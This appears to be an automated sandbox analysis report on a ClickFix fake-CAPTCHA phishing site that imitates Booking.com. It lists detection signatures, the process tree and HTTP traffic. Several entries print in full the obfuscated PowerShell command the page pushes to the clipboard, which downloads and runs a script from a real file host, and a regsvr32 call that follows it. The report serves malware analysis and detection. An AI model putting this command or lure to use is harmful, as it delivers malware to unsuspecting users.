Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
http://confirm-id2719.click/

Overview

General Information

Sample URL:http://confirm-id2719.click/
Analysis ID:1701511
Infos:

Detection

CAPTCHA Scam ClickFix
Score:84
Range:0 - 100
Confidence:100%

Signatures

Detect drive by download via clipboard copy & paste
Yara detected CAPTCHA Scam ClickFix
Bypasses PowerShell execution policy
HTML page adds supicious text to clipboard
Loading BitLocker PowerShell Module
Obfuscated command line found
Powershell uses Background Intelligent Transfer Service (BITS)
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: Suspicious PowerShell Parameter Substring
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Potential Regsvr32 Commandline Flag Anomaly
Sigma detected: Scripting/CommandLine Process Spawned Regsvr32
Sigma detected: Usage Of Web Request Commands And Cmdlets

Classification

Process Tree

  • System is w10x64_ra
  • svchost.exe (PID: 5804 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • chrome.exe (PID: 6480 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: E81F54E6C1129887AEA47E7D092680BF)
    • chrome.exe (PID: 6656 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2076,i,2738407938671327035,787659038189539863,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=1872 /prefetch:3 MD5: E81F54E6C1129887AEA47E7D092680BF)
  • chrome.exe (PID: 5752 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "http://confirm-id2719.click/" MD5: E81F54E6C1129887AEA47E7D092680BF)
  • powershell.exe (PID: 1244 cmdline: "C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -nop -w h -ep bypass -c "Start-BitsTransfer ('h'+'t'+'t'+'ps://files.catbox.moe/cj06ld.txt') ($env:TEMP+'y.ps1'); &($env:TEMP+'y.ps1')" ;$__cfCheck="Click OK to complete verification" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 7036 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • regsvr32.exe (PID: 3204 cmdline: "C:\Windows\system32\regsvr32.exe" /s /i:svc C:\Users\user\AppData\Roaming\Microsoft\Credentials\7Orchid.p12 MD5: B0C2FA35D14A9FAD919E99D9D75E1B9E)
  • rundll32.exe (PID: 3976 cmdline: C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding MD5: EF3179D498793BF4234F708D3BE28633)
  • cleanup

AI Reasoning

No reasoning have been found

Malware Configuration

No configs have been found

Yara Signatures

HTML

SourceRuleDescriptionAuthorStrings
0.0.pages.csvJoeSecurity_CAPTCHAScamYara detected CAPTCHA Scam/ ClickFixJoe Security
    0.1.pages.csvJoeSecurity_CAPTCHAScamYara detected CAPTCHA Scam/ ClickFixJoe Security
      0.2.pages.csvJoeSecurity_CAPTCHAScamYara detected CAPTCHA Scam/ ClickFixJoe Security

        Sigma Signatures

        System Summary

        barindex
        Sigma detected: Potentially Suspicious PowerShell Child Processes
        Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\system32\regsvr32.exe" /s /i:svc C:\Users\user\AppData\Roaming\Microsoft\Credentials\7Orchid.p12 , CommandLine: "C:\Windows\system32\regsvr32.exe" /s /i:svc C:\Users\user\AppData\Roaming\Microsoft\Credentials\7Orchid.p12 , CommandLine|base64offset|contains: , Image: C:\Windows\System32\regsvr32.exe, NewProcessName: C:\Windows\System32\regsvr32.exe, OriginalFileName: C:\Windows\System32\regsvr32.exe, ParentCommandLine: "C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -nop -w h -ep bypass -c "Start-BitsTransfer ('h'+'t'+'t'+'ps://files.catbox.moe/cj06ld.txt') ($env:TEMP+'y.ps1'); &($env:TEMP+'y.ps1')" ;$__cfCheck="Click OK to complete verification", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 1244, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\system32\regsvr32.exe" /s /i:svc C:\Users\user\AppData\Roaming\Microsoft\Credentials\7Orchid.p12 , ProcessId: 3204, ProcessName: regsvr32.exe
        Sigma detected: Suspicious PowerShell Parameter Substring
        Source: Process startedAuthor: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix): Data: Command: "C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -nop -w h -ep bypass -c "Start-BitsTransfer ('h'+'t'+'t'+'ps://files.catbox.moe/cj06ld.txt') ($env:TEMP+'y.ps1'); &($env:TEMP+'y.ps1')" ;$__cfCheck="Click OK to complete verification", CommandLine: "C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -nop -w h -ep bypass -c "Start-BitsTransfer ('h'+'t'+'t'+'ps://files.catbox.moe/cj06ld.txt') ($env:TEMP+'y.ps1'); &($env:TEMP+'y.ps1')" ;$__cfCheck="Click OK to complete verification", CommandLine|base64offset|contains: z), Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2576, ProcessCommandLine: "C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -nop -w h -ep bypass -c "Start-BitsTransfer ('h'+'t'+'t'+'ps://files.catbox.moe/cj06ld.txt') ($env:TEMP+'y.ps1'); &($env:TEMP+'y.ps1')" ;$__cfCheck="Click OK to complete verification", ProcessId: 1244, ProcessName: powershell.exe
        Sigma detected: Change PowerShell Policies to an Insecure Level
        Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -nop -w h -ep bypass -c "Start-BitsTransfer ('h'+'t'+'t'+'ps://files.catbox.moe/cj06ld.txt') ($env:TEMP+'y.ps1'); &($env:TEMP+'y.ps1')" ;$__cfCheck="Click OK to complete verification", CommandLine: "C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -nop -w h -ep bypass -c "Start-BitsTransfer ('h'+'t'+'t'+'ps://files.catbox.moe/cj06ld.txt') ($env:TEMP+'y.ps1'); &($env:TEMP+'y.ps1')" ;$__cfCheck="Click OK to complete verification", CommandLine|base64offset|contains: z), Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2576, ProcessCommandLine: "C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -nop -w h -ep bypass -c "Start-BitsTransfer ('h'+'t'+'t'+'ps://files.catbox.moe/cj06ld.txt') ($env:TEMP+'y.ps1'); &($env:TEMP+'y.ps1')" ;$__cfCheck="Click OK to complete verification", ProcessId: 1244, ProcessName: powershell.exe
        Sigma detected: Potential Regsvr32 Commandline Flag Anomaly
        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\system32\regsvr32.exe" /s /i:svc C:\Users\user\AppData\Roaming\Microsoft\Credentials\7Orchid.p12 , CommandLine: "C:\Windows\system32\regsvr32.exe" /s /i:svc C:\Users\user\AppData\Roaming\Microsoft\Credentials\7Orchid.p12 , CommandLine|base64offset|contains: , Image: C:\Windows\System32\regsvr32.exe, NewProcessName: C:\Windows\System32\regsvr32.exe, OriginalFileName: C:\Windows\System32\regsvr32.exe, ParentCommandLine: "C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -nop -w h -ep bypass -c "Start-BitsTransfer ('h'+'t'+'t'+'ps://files.catbox.moe/cj06ld.txt') ($env:TEMP+'y.ps1'); &($env:TEMP+'y.ps1')" ;$__cfCheck="Click OK to complete verification", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 1244, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\system32\regsvr32.exe" /s /i:svc C:\Users\user\AppData\Roaming\Microsoft\Credentials\7Orchid.p12 , ProcessId: 3204, ProcessName: regsvr32.exe
        Sigma detected: Scripting/CommandLine Process Spawned Regsvr32
        Source: Process startedAuthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\system32\regsvr32.exe" /s /i:svc C:\Users\user\AppData\Roaming\Microsoft\Credentials\7Orchid.p12 , CommandLine: "C:\Windows\system32\regsvr32.exe" /s /i:svc C:\Users\user\AppData\Roaming\Microsoft\Credentials\7Orchid.p12 , CommandLine|base64offset|contains: , Image: C:\Windows\System32\regsvr32.exe, NewProcessName: C:\Windows\System32\regsvr32.exe, OriginalFileName: C:\Windows\System32\regsvr32.exe, ParentCommandLine: "C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -nop -w h -ep bypass -c "Start-BitsTransfer ('h'+'t'+'t'+'ps://files.catbox.moe/cj06ld.txt') ($env:TEMP+'y.ps1'); &($env:TEMP+'y.ps1')" ;$__cfCheck="Click OK to complete verification", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 1244, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\system32\regsvr32.exe" /s /i:svc C:\Users\user\AppData\Roaming\Microsoft\Credentials\7Orchid.p12 , ProcessId: 3204, ProcessName: regsvr32.exe
        Sigma detected: Usage Of Web Request Commands And Cmdlets
        Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -nop -w h -ep bypass -c "Start-BitsTransfer ('h'+'t'+'t'+'ps://files.catbox.moe/cj06ld.txt') ($env:TEMP+'y.ps1'); &($env:TEMP+'y.ps1')" ;$__cfCheck="Click OK to complete verification", CommandLine: "C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -nop -w h -ep bypass -c "Start-BitsTransfer ('h'+'t'+'t'+'ps://files.catbox.moe/cj06ld.txt') ($env:TEMP+'y.ps1'); &($env:TEMP+'y.ps1')" ;$__cfCheck="Click OK to complete verification", CommandLine|base64offset|contains: z), Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2576, ProcessCommandLine: "C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -nop -w h -ep bypass -c "Start-BitsTransfer ('h'+'t'+'t'+'ps://files.catbox.moe/cj06ld.txt') ($env:TEMP+'y.ps1'); &($env:TEMP+'y.ps1')" ;$__cfCheck="Click OK to complete verification", ProcessId: 1244, ProcessName: powershell.exe
        Sigma detected: Non Interactive PowerShell Process Spawned
        Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -nop -w h -ep bypass -c "Start-BitsTransfer ('h'+'t'+'t'+'ps://files.catbox.moe/cj06ld.txt') ($env:TEMP+'y.ps1'); &($env:TEMP+'y.ps1')" ;$__cfCheck="Click OK to complete verification", CommandLine: "C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -nop -w h -ep bypass -c "Start-BitsTransfer ('h'+'t'+'t'+'ps://files.catbox.moe/cj06ld.txt') ($env:TEMP+'y.ps1'); &($env:TEMP+'y.ps1')" ;$__cfCheck="Click OK to complete verification", CommandLine|base64offset|contains: z), Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2576, ProcessCommandLine: "C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -nop -w h -ep bypass -c "Start-BitsTransfer ('h'+'t'+'t'+'ps://files.catbox.moe/cj06ld.txt') ($env:TEMP+'y.ps1'); &($env:TEMP+'y.ps1')" ;$__cfCheck="Click OK to complete verification", ProcessId: 1244, ProcessName: powershell.exe
        Sigma detected: Windows Processes Suspicious Parent Directory
        Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 660, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 5804, ProcessName: svchost.exe

        Suricata Signatures

        No Suricata rule has matched

        Joe Sandbox Signatures

        Click to jump to signature section

        Show All Signature Results

        Phishing

        barindex
        Yara detected CAPTCHA Scam ClickFix
        Source: Yara matchFile source: 0.0.pages.csv, type: HTML
        Source: Yara matchFile source: 0.1.pages.csv, type: HTML
        Source: Yara matchFile source: 0.2.pages.csv, type: HTML
        Source: unknownHTTPS traffic detected: 52.149.20.212:443 -> 192.168.2.18:49733 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 13.107.246.57:443 -> 192.168.2.18:49735 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 52.149.20.212:443 -> 192.168.2.18:49736 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 108.181.20.43:443 -> 192.168.2.18:49737 version: TLS 1.2
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
        Source: chrome.exeMemory has grown: Private usage: 1MB later: 37MB
        Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.7
        Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.7
        Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.7
        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
        Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.7
        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
        Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.7
        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
        Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.7
        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
        Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
        Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
        Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
        Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
        Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
        Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
        Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
        Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
        Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
        Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
        Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
        Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
        Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
        Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
        Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
        Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
        Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: confirm-id2719.clickConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /static/manage_light.v14b6812v.css HTTP/1.1Host: confirm-id2719.clickConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://confirm-id2719.click/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /static/core_6136b7d7dc3346df1f4c9b379c38fa52.css HTTP/1.1Host: confirm-id2719.clickConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://confirm-id2719.click/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /Reservation_files/1df260bd9a2d14e1601c8c9ff1714c05acf328f8.svg HTTP/1.1Host: confirm-id2719.clickConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://confirm-id2719.click/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /Reservation_files/319302651.jpg HTTP/1.1Host: confirm-id2719.clickConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://confirm-id2719.click/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /Reservation_files/318586996.jpg HTTP/1.1Host: confirm-id2719.clickConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://confirm-id2719.click/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /Reservation_files/137927810.jpg HTTP/1.1Host: confirm-id2719.clickConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://confirm-id2719.click/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /themes/custom/booking/fonts/icons/icons.woff?v=1.3.3 HTTP/1.1host: partner.booking.comorigin: https://confirm-id2719.clicksec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*sec-fetch-site: cross-sitesec-fetch-mode: corssec-fetch-dest: fontreferer: https://confirm-id2719.click/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=1
        Source: global trafficHTTP traffic detected: GET /Reservation_files/166939781.jpg HTTP/1.1Host: confirm-id2719.clickConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://confirm-id2719.click/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /cdn-cgi/scripts/5c5dd728/cloudflare-static/email-decode.min.js HTTP/1.1Host: confirm-id2719.clickConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://confirm-id2719.click/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /Reservation_files/333642474.jpg HTTP/1.1Host: confirm-id2719.clickConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://confirm-id2719.click/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /Reservation_files/438648711.jpg HTTP/1.1Host: confirm-id2719.clickConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://confirm-id2719.click/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /Reservation_files/625bf8aec1510ce62b414074752052f184a60801.svg HTTP/1.1Host: confirm-id2719.clickConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://confirm-id2719.click/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /Reservation_files/b_logo_blue.png HTTP/1.1Host: confirm-id2719.clickConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://confirm-id2719.click/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /Reservation_files/no.png HTTP/1.1Host: confirm-id2719.clickConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://confirm-id2719.click/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
